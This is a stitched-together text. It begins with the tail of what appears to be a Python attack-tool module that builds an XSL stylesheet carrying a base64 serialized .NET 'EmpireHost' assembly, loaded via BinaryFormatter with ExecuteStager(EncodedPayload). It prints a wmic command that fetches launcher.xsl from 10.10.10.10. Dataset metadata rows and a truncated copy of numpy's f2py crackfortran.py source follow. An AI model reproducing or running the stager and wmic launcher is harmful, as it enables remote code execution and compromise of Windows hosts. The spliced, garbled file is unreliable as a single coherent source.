"UABvAHcAZQByAFMAaABlAGwAbAAAF3AAcgBvAGYAaQBsAGUALgBwAHMAMQAAIXAAcgBvAGYAaQBs"+ "AGUAXwB0AGUAcwB0AC4AcABzADEAAANfAABhUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMA"+ "bwBmAHQAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAMQBcAFAAbwB3AGUAcgBTAGgAZQBsAGwARQBu"+ "AGcAaQBuAGUAAB9BAHAAcABsAGkAYwBhAHQAaQBvAG4AQgBhAHMAZQAAgItUAGgAZQAgAEMAdQBy"+ "AHMAbwByAFAAbwBzAGkAdABpAG8AbgAgAHAAcgBvAHAAZQByAHQAeQAgAGkAcwAgAG4AbwB0ACAA"+ "aQBtAHAAbABlAG0AZQBuAHQAZQBkACAAYgB5ACAATQB5AFIAYQB3AFUAcwBlAHIASQBuAHQAZQBy"+ "AGYAYQBjAGUALgAAgI1UAGgAZQAgAEcAZQB0AEIAdQBmAGYAZQByAEMAbwBuAHQAZQBuAHQAcwAg"+ "AG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkA"+ "IABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAAB9VABoAGUAIABSAGUAYQBk"+ "AEsAZQB5ACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4A"+ "dABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAl1QA"+ "aABlACAAUwBjAHIAbwBsAGwAQgB1AGYAZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0"+ "AGgAbwBkACAAaQBzACAAbgBvAHQAIABpAG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkA"+ "UgBhAHcAVQBzAGUAcgBJAG4AdABlAHIAZgBhAGMAZQAuAACAkVQAaABlACAAUwBlAHQAQgB1AGYA"+ "ZgBlAHIAQwBvAG4AdABlAG4AdABzACgAKQAgAG0AZQB0AGgAbwBkACAAaQBzACAAbgBvAHQAIABp"+ "AG0AcABsAGUAbQBlAG4AdABlAGQAIABiAHkAIABNAHkAUgBhAHcAVQBzAGUAcgBJAG4AdABlAHIA"+ "ZgBhAGMAZQAuAAAPbwBwAHQAaQBvAG4AcwAAEXUAcwBlAHIATgBhAG0AZQAANUMAUgBFAEQAVQBJ"+ "AF8ATQBBAFgAXwBVAFMARQBSAE4AQQBNAEUAXwBMAEUATgBHAFQASAAAEXAAYQBzAHMAdwBvAHIA"+ "ZAAANUMAUgBFAEQAVQBJAF8ATQBBAFgAXwBQAEEAUwBTAFcATwBSAEQAXwBMAEUATgBHAFQASAAA"+ "C3YAYQBsAHUAZQAAD2MAYQBwAHQAaQBvAG4AAA9tAGUAcwBzAGEAZwBlAACjYeiU2ONRRKeNL06S"+ "sHvIAAMgAAEEIAEBCAUgAQERFQQgAQEOBCABAQIDBwEOBQAAEoD5BQABHQUOBSABDh0FCwcFEk0c"+ "HRJRCBJRBAAAEk0GIAEBEoEBCAACEkkScRJNBAABARwEAAASRQUgAQESSQUgAQESUQggABUSXQES"+ "YQMHARwEAAECDgUgARJFDgQgABJRBSAAEoERBxUSXQESgRUFIAETAAgJIAIBEYEZEYEZCyABFRJd"+ "ARJhEoEdEgcGHBJZHBUSXQESYRUSZQEcDgUgABKBIQogBAESVQ4RgSUcBRUSZQEcBSABARMABhUS"+ "XQESYQMgAAgDIAAcBSAAEoCBBSACDggIBAcBEmkFBwIcElUFIAASgSkFIAARgS0DIAAOBQAAEoEx"+ "BCAAEn0HIAQBCAgICAQAABF5IAcGFRKAlQIOEmEVEoCdARKAmRKAmR0ODhUSgJUCDhJhBwAEDg4O"+ "Dg4KIAMBEYC5EYC5DggVEoCVAg4SYQcVEl0BEoCZCSAAFRKAnQETAAgVEoCdARKAmQQgABMAAwAA"+ "DgUAARJhHAcgAgETABMBAyAAAg8HBRQOAgACAAASgI0IDggEAAASfQcUDgIAAgAACQADDhKBRQ4d"+ "HAYgARKAjQ4HFRJdARKAoQUgAQ4SfQUAAgIODgUAAg4ODiMHDBQOAgACAAASgI0VEl0BCBUSXQEI"+ "CAgVEoCdAQgICA4OCAUVEl0BCAYVEoClAQgGFRKAnQEICyADEoCNEoFFDh0cByACEoCNCAgEBwES"+ "KAcgAgEOEoC1BAABAQ4FBwERgLkFAAARgLkGAAEBEYC5AwAAAQcHAx0OHQ4DAgYOBiABHQ4dAwQg"+ "AQMIDAcDFA4CAAIAAAgdDgUgAgEICAYgAwEICA4EIAEBHAogABUSgVEBEoFVBSACAQ4cCBUSgVEB"+ "EoFVFQcKFRKAxQESUQ4ODg4SYRJRHQ4IDgcVEoDFARJRBSABElEOBiACElEOHAYgAhJRDgIFIAAd"+ "EwAEBwIODgYAAQ4RgWkGAAMODg4OCgcEDhKAyRKAzQ4EBhKAzQYgARKAzQ4EIAEcDgUAABKAyQQA"+ "AQ4OCAABEoF1EYF5CAABEoDJEoF1AwAACAUAAgEICAQAAQEIAwAAAgIGGAUAABKBgQUgABKAhQ4H"+ "BxKAtRKAtQ4IAwMSKAQKARIoBCABAQMECgESLBMHDRJUETgYGAgYCBgIAhFQCB4ABgABGBKAtQUA"+ "AgIYGAQAARgIBQACGBgIAh4ABAABARgLBwYSVBgYAhFQHgAFIAIBDg4GAAMBGAgGBAABDhgEBwES"+ "TAQgAB0DERABARUSgMUBHgAVEoClAR4AAwoBAwYVEoGZAQMFIAIBHBgGFRKAxQEDCiABARUSgZkB"+ "EwAPBwcSgI0SgI0SgI0ICAgICwcICAgIGBgYCBIsBwcDEoC1CAMFAAIGGAgGBwISgLUIBgABCBKB"+ "dQi3elxWGTTgiQgxvzhWrTZONTpTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABc"+ "AFAAbwB3AGUAcgBTAGgAZQBsAGwAIFAAbwB3AGUAcgBTAGgAZQBsAGwARQBuAGcAaQBuAGUAHkEA"+ "cABwAGwAaQBjAGEAdABpAG8AbgBCAGEAcwBlAAIxAAQBAAAABAIAAAAEEAAAAAQgAAAABAABAAAE"+ "AAIAAAQAEAAABAAAABAEBAAAAAQIAAAABEAAAAAEgAAAAAQABAAABAAIAAAEAEAAAAQAAAIABAAA"+ "BAAEAAAIAAQAABAABP9/AAAEAQIAAAQAAAAABMcEAAAEVwAAAATsAwAAARUDBhIMAgYCAgYIAwYS"+ 
"EAMGEkkDBhJFAgYcAwYReQMGEn0DBhIUAwYSHAQGEoC1AwYROAMGETwDBhFQBCABAg4FIAEBElUG"+ "IAIBHBJtBSABARIMBCAAEXkEIAASSRIACQgQETQIEAkYCRAYEAkQAggVAAkCCBgJEoCNEAgSgI0Q"+ "CBKAjRAIBSAAEoCREyADFRKAlQIOEmEODhUSXQESgJkNIAQIDg4VEl0BEoChCBYgBBUSXQEIDg4V"+ "El0BEoChFRKApQEICSAEEoCpDg4ODg8gBhKAqQ4ODg4RgK0RgLEFIAASgLUHIAIBChKAvQUAAR0O"+ "DhAAARQOAgACAAAVEl0BEoChCAAEEmEODg4OBgABHRJRDgcAAh0SUQ4CBQACDg4CBgADDg4CAgUg"+ "ABGAuQYgAQERgLkFIAARgNUGIAEBEYDVBSAAEYDZBiABARGA2Q4gARQRgN0CAAIAABGA4QggARGA"+ "5RGA6Q8gBAERgOERgNkRgOERgN0PIAIBEYDZFBGA3QIAAgAACSACARGA4RGA3QYAAhIoDg4HAAMS"+ "KA4OGAgABBIoDg4ODgkABRIoDg4YDg4GAAISLA4OBwADEiwODhgMAAQSLA4OEoC1EoC1DQAFEiwO"+ "DhgSgLUSgLUIAAMSKBJADg4MAAMSLBJAEoC1EoC1DRABAx4AEkASgLUSgLUHAAMSKA4ODggABBIo"+ "Dg4OGAkABRIoDg4ODg4KAAYSKA4ODhgODgYAARIoEkQIAAMSKBJEDg4HAAMSLA4ODggABBIsDg4O"+ "GA0ABRIsDg4OEoC1EoC1DgAGEiwODg4YEoC1EoC1BgABEiwSRAwAAxIsEkQSgLUSgLUNEAEDHgAS"+ "RBKAtRKAtQYgAQESgLUGAAESgLUOAyAAGAQgAQEYBCAAETgFIAEBETgEIAARPAUgAQERPAYgAwEO"+ "Dg4RAAoRUBJUDhgIGAgYCBACETwTAAkRUBJUCBAIGAgQGBAIEAIROAkABQIIDg4YEAgJAAUCCBgY"+ "GBAIFQAJAggYCBKAjRAIEoCNEAgSgI0QCA8ACQIIGAgYEAgYEAgYEAgHAAMSKAIYCAcAAxIsAhgI"+ "BgABEoC1GAcAAhKAtRgIAygAAgMoAAgEKAASfQQoABF5AygADgUoABKAgQUoABKAhQQoABJJBSgA"+ "EoCRBSgAEYC5BSgAEYDVBSgAEYDZBSgAEoC1AygAGAQoABE4BCgAETwIAQAIAAAAAAAeAQABAFQC"+ "FldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkVtcGlyZUhvc3QAAAUBAAAAABcB"+ "ABJDb3B5cmlnaHQgwqkgIDIwMTcAACkBACQyZWI5ZGQxMC1iNGY5LTQ2NDctYjFjMy0yNWMwOTky"+ "OTc5MDUAAAwBAAcxLjAuMC4wAAAFAQABAAAAAAAAAAAAIvEzWQAAAAACAAAAHAEAAFiQAABYcgAA"+ "UlNEU9NhchFbyoVAkiWQmGgji+sBAAAAQzpcRGV2ZWxvcG1lbnRcRW1waXJlSG9zdFxFbXBpcmVI"+ "b3N0XG9ialxSZWxlYXNlXEVtcGlyZUhvc3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACc"+ "kQAAAAAAAAAAAAC2kQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqJEAAAAAAAAAAAAAAABfQ29y"+ "RGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA"+ "AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFigAAAsAwAAAAAAAAAAAAAs"+ "AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAA"+ "AQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu"+ "AGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEjAIAAAEAUwB0AHIA"+ "aQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAaAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBv"+ "AG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAD4A"+ "CwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABFAG0AcABpAHIAZQBIAG8AcwB0"+ "AAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA+AA8A"+ "AQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAbQBwAGkAcgBlAEgAbwBzAHQALgBkAGwAbAAA"+ "AAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQA"+ "IACpACAAIAAyADAAMQA3AAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAA"+ "AAAAAABGAA8AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAARQBtAHAAaQByAGUA"+ "SABvAHMAdAAuAGQAbABsAAAAAAA2AAsAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEUAbQBw"+ "AGkAcgBlAEgAbwBzAHQAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEA"+ "LgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAu"+ "ADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAAADAAAAMgxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3Rl"+ "bS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA"; var entry_class = 'EmpireHost'; try { setversion(); var stm = base64ToStream(serialized_obj); var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); var al = new ActiveXObject('System.Collections.ArrayList'); var n = fmt.SurrogateSelector; var d = fmt.Deserialize_2(stm); al.Add(n); var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); o.ExecuteStager(EncodedPayload); } catch (e) { debug(e.message); } ]]></ms:script> </stylesheet> """ command = """\n[+] wmic process get brief /format:"http://10.10.10.10/launcher.xsl" """ print colored(command, 'green', attrs=['bold']) return code
bsd-3-clause
-4,492,481,551,449,662,500
82.566216
209
0.755138
false
2.072769
false
false
false
grlee77/numpy
numpy/f2py/crackfortran.py
1
130739
#!/usr/bin/env python3
"""
crackfortran --- read fortran (77,90) code and extract declaration information.

Copyright 1999-2004 Pearu Peterson all rights reserved,
Pearu Peterson <pearu@ioc.ee>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.

NO WARRANTY IS EXPRESSED OR IMPLIED.  USE AT YOUR OWN RISK.
$Date: 2005/09/27 07:13:49 $
Pearu Peterson


Usage of crackfortran:
======================
Command line keys: -quiet,-verbose,-fix,-f77,-f90,-show,-h <pyffilename>
                   -m <module name for f77 routines>,--ignore-contains
Functions: crackfortran, crack2fortran
The following Fortran statements/constructions are supported
(or will be if needed):
    block data,byte,call,character,common,complex,contains,data,
    dimension,double complex,double precision,end,external,function,
    implicit,integer,intent,interface,intrinsic,
    logical,module,optional,parameter,private,public,
    program,real,(sequence?),subroutine,type,use,virtual,
    include,pythonmodule
Note: 'virtual' is mapped to 'dimension'.
Note: 'implicit integer (z) static (z)' is 'implicit static (z)' (this is minor bug).
Note: code after 'contains' will be ignored until its scope ends.
Note: 'common' statement is extended: dimensions are moved to variable definitions
Note: f2py directive: <commentchar>f2py<line> is read as <line>
Note: pythonmodule is introduced to represent Python module

Usage:
  `postlist=crackfortran(files)`
  `postlist` contains declaration information read from the list of files `files`.
  `crack2fortran(postlist)` returns a fortran code to be saved to pyf-file

  `postlist` has the following structure:
 *** it is a list of dictionaries containing `blocks':
     B = {'block','body','vars','parent_block'[,'name','prefix','args','result',
          'implicit','externals','interfaced','common','sortvars',
          'commonvars','note']}
     B['block'] = 'interface' | 'function' | 'subroutine' | 'module' |
                  'program' | 'block data' | 'type' | 'pythonmodule'
     B['body'] --- list containing `subblocks' with the same structure as `blocks'
     B['parent_block'] --- dictionary of a parent block:
                           C['body'][<index>]['parent_block'] is C
     B['vars'] --- dictionary of variable definitions
     B['sortvars'] --- dictionary of variable definitions sorted by dependence
                       (independent first)
     B['name'] --- name of the block (not if B['block']=='interface')
     B['prefix'] --- prefix string (only if B['block']=='function')
     B['args'] --- list of argument names if B['block']== 'function' | 'subroutine'
     B['result'] --- name of the return value (only if B['block']=='function')
     B['implicit'] --- dictionary {'a':<variable definition>,'b':...} | None
     B['externals'] --- list of variables being external
     B['interfaced'] --- list of variables being external and defined
     B['common'] --- dictionary of common blocks (list of objects)
     B['commonvars'] --- list of variables used in common blocks
                         (dimensions are moved to variable definitions)
     B['from'] --- string showing the 'parents' of the current block
     B['use'] --- dictionary of modules used in current block:
         {<modulename>:{['only':<0|1>],['map':{<local_name1>:<use_name1>,...}]}}
     B['note'] --- list of LaTeX comments on the block
     B['f2pyenhancements'] --- optional dictionary
          {'threadsafe':'','fortranname':<name>,
           'callstatement':<C-expr>|<multi-line block>,
           'callprotoargument':<C-expr-list>,
           'usercode':<multi-line block>|<list of multi-line blocks>,
           'pymethoddef:<multi-line block>'
           }
     B['entry'] --- dictionary {entryname:argslist,..}
     B['varnames'] --- list of variable names given in the order of reading the
                       Fortran code, useful for derived types.
     B['saved_interface'] --- a string of scanned routine signature, defines
                              explicit interface
 *** Variable definition is a dictionary
     D = B['vars'][<variable name>] =
     {'typespec'[,'attrspec','kindselector','charselector','=','typename']}
     D['typespec'] = 'byte' | 'character' | 'complex' | 'double complex' |
                     'double precision' | 'integer' | 'logical' | 'real' | 'type'
     D['attrspec'] --- list of attributes (e.g. 'dimension(<arrayspec>)',
                       'external','intent(in|out|inout|hide|c|callback|cache|aligned4|aligned8|aligned16)',
                       'optional','required', etc)
     K = D['kindselector'] = {['*','kind']} (only if D['typespec'] =
                             'complex' | 'integer' | 'logical' | 'real' )
     C = D['charselector'] = {['*','len','kind']}
                             (only if D['typespec']=='character')
     D['='] --- initialization expression string
     D['typename'] --- name of the type if D['typespec']=='type'
     D['dimension'] --- list of dimension bounds
     D['intent'] --- list of intent specifications
     D['depend'] --- list of variable names on which current variable depends on
     D['check'] --- list of C-expressions; if C-expr returns zero, exception is raised
     D['note'] --- list of LaTeX comments on the variable
 *** Meaning of kind/char selectors (few examples):
     D['typespec>']*K['*']
     D['typespec'](kind=K['kind'])
     character*C['*']
     character(len=C['len'],kind=C['kind'])
     (see also fortran type declaration statement formats below)

Fortran 90 type declaration statement format (F77 is subset of F90)
====================================================================
(Main source: IBM XL Fortran 5.1 Language Reference Manual)
type declaration = <typespec> [[<attrspec>]::] <entitydecl>
<typespec> = byte                          |
             character[<charselector>]     |
             complex[<kindselector>]       |
             double complex                |
             double precision              |
             integer[<kindselector>]       |
             logical[<kindselector>]       |
             real[<kindselector>]          |
             type(<typename>)
<charselector> = * <charlen>                   |
                 ([len=]<len>[,[kind=]<kind>]) |
                 (kind=<kind>[,len=<len>])
<kindselector> = * <intlen>      |
                 ([kind=]<kind>)
<attrspec> = comma separated list of attributes.
             Only the following attributes are used in building up the interface:
                external
                (parameter --- affects '=' key)
                optional
                intent
             Other attributes are ignored.
<intentspec> = in | out | inout
<arrayspec> = comma separated list of dimension bounds.
<entitydecl> = <name> [[*<charlen>][(<arrayspec>)] | [(<arrayspec>)]*<charlen>]
                      [/<init_expr>/ | =<init_expr>] [,<entitydecl>]

In addition, the following attributes are used: check,depend,note

TODO:
    * Apply 'parameter' attribute (e.g. 'integer parameter :: i=2' 'real x(i)'
      -> 'real x(2)')
      The above may be solved by creating appropriate preprocessor program,
      for example.

"""
import sys
import string
import fileinput
import re
import os
import copy
import platform

from . import __version__

# The environment provided by auxfuncs.py is needed for some calls to eval.
# As the needed functions cannot be determined by static inspection of the
# code, it is safest to use import * pending a major refactoring of f2py.
from .auxfuncs import *

f2py_version = __version__.version
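# --- Illustrative usage sketch (kept commented out; an editorial example that
# --- is not part of the original module). It exercises only the two entry
# --- points the docstring above documents; the file name 'example.f' is a
# --- placeholder assumption.
#
#     from numpy.f2py.crackfortran import crackfortran, crack2fortran
#
#     postlist = crackfortran(['example.f'])        # list of block dictionaries
#     for block in postlist:
#         print(block['block'], block.get('name'))  # e.g. "subroutine foo"
#     print(crack2fortran(postlist))                # pyf text for a .pyf file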
# Global flags:
strictf77 = 1            # Ignore `!' comments unless line[0]=='!'
sourcecodeform = 'fix'   # 'fix','free'
quiet = 0                # Be verbose if 0 (Obsolete: not used any more)
verbose = 1              # Be quiet if 0, extra verbose if > 1.
tabchar = 4 * ' '
pyffilename = ''
f77modulename = ''
skipemptyends = 0        # for old F77 programs without 'program' statement
ignorecontains = 1
dolowercase = 1
debug = []

# Global variables
beginpattern = ''
currentfilename = ''
expectbegin = 1
f90modulevars = {}
filepositiontext = ''
gotnextfile = 1
groupcache = None
groupcounter = 0
grouplist = {groupcounter: []}
groupname = ''
include_paths = []
neededmodule = -1
onlyfuncs = []
previous_context = None
skipblocksuntil = -1
skipfuncs = []
skipfunctions = []
usermodules = []


def reset_global_f2py_vars():
    global groupcounter, grouplist, neededmodule, expectbegin
    global skipblocksuntil, usermodules, f90modulevars, gotnextfile
    global filepositiontext, currentfilename, skipfunctions, skipfuncs
    global onlyfuncs, include_paths, previous_context
    global strictf77, sourcecodeform, quiet, verbose, tabchar, pyffilename
    global f77modulename, skipemptyends, ignorecontains, dolowercase, debug

    # flags
    strictf77 = 1
    sourcecodeform = 'fix'
    quiet = 0
    verbose = 1
    tabchar = 4 * ' '
    pyffilename = ''
    f77modulename = ''
    skipemptyends = 0
    ignorecontains = 1
    dolowercase = 1
    debug = []
    # variables
    groupcounter = 0
    grouplist = {groupcounter: []}
    neededmodule = -1
    expectbegin = 1
    skipblocksuntil = -1
    usermodules = []
    f90modulevars = {}
    gotnextfile = 1
    filepositiontext = ''
    currentfilename = ''
    skipfunctions = []
    skipfuncs = []
    onlyfuncs = []
    include_paths = []
    previous_context = None


def outmess(line, flag=1):
    global filepositiontext

    if not verbose:
        return
    if not quiet:
        if flag:
            sys.stdout.write(filepositiontext)
        sys.stdout.write(line)


re._MAXCACHE = 50
defaultimplicitrules = {}
for c in "abcdefghopqrstuvwxyz$_":
    defaultimplicitrules[c] = {'typespec': 'real'}
for c in "ijklmn":
    defaultimplicitrules[c] = {'typespec': 'integer'}
del c
badnames = {}
invbadnames = {}
for n in ['int', 'double', 'float', 'char', 'short', 'long', 'void', 'case',
          'while', 'return', 'signed', 'unsigned', 'if', 'for', 'typedef',
          'sizeof', 'union', 'struct', 'static', 'register', 'new', 'break',
          'do', 'goto', 'switch', 'continue', 'else', 'inline', 'extern',
          'delete', 'const', 'auto', 'len', 'rank', 'shape', 'index', 'slen',
          'size', '_i', 'max', 'min', 'flen', 'fshape', 'string',
          'complex_double', 'float_double', 'stdin', 'stderr', 'stdout',
          'type', 'default']:
    badnames[n] = n + '_bn'
    invbadnames[n + '_bn'] = n


def rmbadname1(name):
    if name in badnames:
        errmess('rmbadname1: Replacing "%s" with "%s".\n' %
                (name, badnames[name]))
        return badnames[name]
    return name


def rmbadname(names):
    return [rmbadname1(_m) for _m in names]


def undo_rmbadname1(name):
    if name in invbadnames:
        errmess('undo_rmbadname1: Replacing "%s" with "%s".\n'
                % (name, invbadnames[name]))
        return invbadnames[name]
    return name


def undo_rmbadname(names):
    return [undo_rmbadname1(_m) for _m in names]


def getextension(name):
    i = name.rfind('.')
    if i == -1:
        return ''
    if '\\' in name[i:]:
        return ''
    if '/' in name[i:]:
        return ''
    return name[i + 1:]

is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match
_has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search
_has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search
_has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search
_free_f90_start = re.compile(r'[^c*]\s*[^\s\d\t]', re.I).match


def is_free_format(file):
    """Check if file is in free format Fortran."""
    # f90 allows both fixed and free format, assuming fixed unless
    # signs of free format are detected.
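    # Illustrative note on the heuristic (editorial comment, not in the
    # original source): with the regexes above, an emacs-style
    # '-*- fortran -*-' header forces fixed form and '-*- f90 -*-' forces
    # free form; otherwise up to 15 non-comment lines are scanned, and a
    # statement character within the first five columns (e.g. a file opening
    # with "program main") or a line ending in the continuation character
    # '&' marks the file as free format.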
result = 0 with open(file, 'r') as f: line = f.readline() n = 15 # the number of non-comment lines to scan for hints if _has_f_header(line): n = 0 elif _has_f90_header(line): n = 0 result = 1 while n > 0 and line: if line[0] != '!' and line.strip(): n -= 1 if (line[0] != '\t' and _free_f90_start(line[:5])) or line[-2:-1] == '&': result = 1 break line = f.readline() return result # Read fortran (77,90) code def readfortrancode(ffile, dowithline=show, istop=1): """ Read fortran codes from files and 1) Get rid of comments, line continuations, and empty lines; lower cases. 2) Call dowithline(line) on every line. 3) Recursively call itself when statement \"include '<filename>'\" is met. """ global gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77 global beginpattern, quiet, verbose, dolowercase, include_paths if not istop: saveglobals = gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\ beginpattern, quiet, verbose, dolowercase if ffile == []: return localdolowercase = dolowercase cont = 0 finalline = '' ll = '' includeline = re.compile( r'\s*include\s*(\'|")(?P<name>[^\'"]*)(\'|")', re.I) cont1 = re.compile(r'(?P<line>.*)&\s*\Z') cont2 = re.compile(r'(\s*&|)(?P<line>.*)') mline_mark = re.compile(r".*?'''") if istop: dowithline('', -1) ll, l1 = '', '' spacedigits = [' '] + [str(_m) for _m in range(10)] filepositiontext = '' fin = fileinput.FileInput(ffile) while True: l = fin.readline() if not l: break if fin.isfirstline(): filepositiontext = '' currentfilename = fin.filename() gotnextfile = 1 l1 = l strictf77 = 0 sourcecodeform = 'fix' ext = os.path.splitext(currentfilename)[1] if is_f_file(currentfilename) and \ not (_has_f90_header(l) or _has_fix_header(l)): strictf77 = 1 elif is_free_format(currentfilename) and not _has_fix_header(l): sourcecodeform = 'free' if strictf77: beginpattern = beginpattern77 else: beginpattern = beginpattern90 outmess('\tReading file %s (format:%s%s)\n' % (repr(currentfilename), sourcecodeform, strictf77 and ',strict' or '')) l = l.expandtabs().replace('\xa0', ' ') # Get rid of newline characters while not l == '': if l[-1] not in "\n\r\f": break l = l[:-1] if not strictf77: (l, rl) = split_by_unquoted(l, '!') l += ' ' if rl[:5].lower() == '!f2py': # f2py directive l, _ = split_by_unquoted(l + 4 * ' ' + rl[5:], '!') if l.strip() == '': # Skip empty line cont = 0 continue if sourcecodeform == 'fix': if l[0] in ['*', 'c', '!', 'C', '#']: if l[1:5].lower() == 'f2py': # f2py directive l = ' ' + l[5:] else: # Skip comment line cont = 0 continue elif strictf77: if len(l) > 72: l = l[:72] if not (l[0] in spacedigits): raise Exception('readfortrancode: Found non-(space,digit) char ' 'in the first column.\n\tAre you sure that ' 'this code is in fix form?\n\tline=%s' % repr(l)) if (not cont or strictf77) and (len(l) > 5 and not l[5] == ' '): # Continuation of a previous line ll = ll + l[6:] finalline = '' origfinalline = '' else: if not strictf77: # F90 continuation r = cont1.match(l) if r: l = r.group('line') # Continuation follows .. if cont: ll = ll + cont2.match(l).group('line') finalline = '' origfinalline = '' else: # clean up line beginning from possible digits. l = ' ' + l[5:] if localdolowercase: finalline = ll.lower() else: finalline = ll origfinalline = ll ll = l cont = (r is not None) else: # clean up line beginning from possible digits. 
l = ' ' + l[5:] if localdolowercase: finalline = ll.lower() else: finalline = ll origfinalline = ll ll = l elif sourcecodeform == 'free': if not cont and ext == '.pyf' and mline_mark.match(l): l = l + '\n' while True: lc = fin.readline() if not lc: errmess( 'Unexpected end of file when reading multiline\n') break l = l + lc if mline_mark.match(lc): break l = l.rstrip() r = cont1.match(l) if r: l = r.group('line') # Continuation follows .. if cont: ll = ll + cont2.match(l).group('line') finalline = '' origfinalline = '' else: if localdolowercase: finalline = ll.lower() else: finalline = ll origfinalline = ll ll = l cont = (r is not None) else: raise ValueError( "Flag sourcecodeform must be either 'fix' or 'free': %s" % repr(sourcecodeform)) filepositiontext = 'Line #%d in %s:"%s"\n\t' % ( fin.filelineno() - 1, currentfilename, l1) m = includeline.match(origfinalline) if m: fn = m.group('name') if os.path.isfile(fn): readfortrancode(fn, 